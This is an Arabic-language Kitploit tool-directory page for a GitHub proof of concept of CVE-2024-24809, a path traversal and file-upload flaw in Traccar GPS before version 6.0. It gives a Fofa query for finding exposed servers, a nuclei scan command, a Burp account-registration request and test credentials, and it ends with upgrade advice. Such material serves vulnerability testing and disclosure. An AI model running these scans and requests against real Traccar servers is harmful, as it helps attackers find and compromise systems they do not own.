Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-24809-Proof-of-concept — ثغرات حرجة في نظام Traccar GPS تعرّض المستخدمين لهجمات عن بُعد | Kitploit
أدوات/GitHubGitHub/gh-ost00/cve-2024-24809-proof-of-concept
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتالتصيد الاحتيالياختبار الاختراق
GitHubgh-ost00/cve-2024-24809-proof-of-concept

CVE-2024-24809-Proof-of-concept

ثغرات حرجة في نظام Traccar GPS تعرّض المستخدمين لهجمات عن بُعد

عرض المستودع
51منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تفاصيل CVE-2024-24809

الوصف

تراكار (Traccar) هو نظام تتبع GPS مفتوح المصدر. الإصدارات السابقة للإصدار 6.0 معرّضة لثغرة اجتياز المسار (Path Traversal) والرفع غير المقيد لملف من نوع خطير. نظرًا لأن النظام يسمح بالتسجيل افتراضيًا، يمكن للمهاجمين الحصول على صلاحيات مستخدم عادي عن طريق تسجيل حساب واستغلال هذه الثغرة لرفع ملفات بالبادئة device. تحت أي مجلد. يمكن للمهاجمين استخدام هذه الثغرة في التصيد الاحتيالي وهجمات البرمجة النصية عبر المواقع (XSS)، وربما تنفيذ أوامر عشوائية على الخادم. يحتوي الإصدار 6.0 على تصحيح لهذه المشكلة.

الاستخدام

root@kitploit:~
Fofa query : app="traccar"
root@kitploit:~
nuclei --target {target.com} -t CVE-2024-24809.yaml

إثبات المفهوم (باستخدام burpsuite)

root@kitploit:~
POST /api/users HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;charset=UTF-8

{"name": "{{name}}", "email": "{{email}}", "password": "{{password}}", "totpKey": null}

حساب الاختبار

root@kitploit:~
name: "ghostsec"
password: "ghostsec"
email: "[email protected]"

كيفية الإصلاح؟

قم بترقية org.traccar:traccar إلى الإصدار 6.0 أو أحدث.

تنزيل الأداة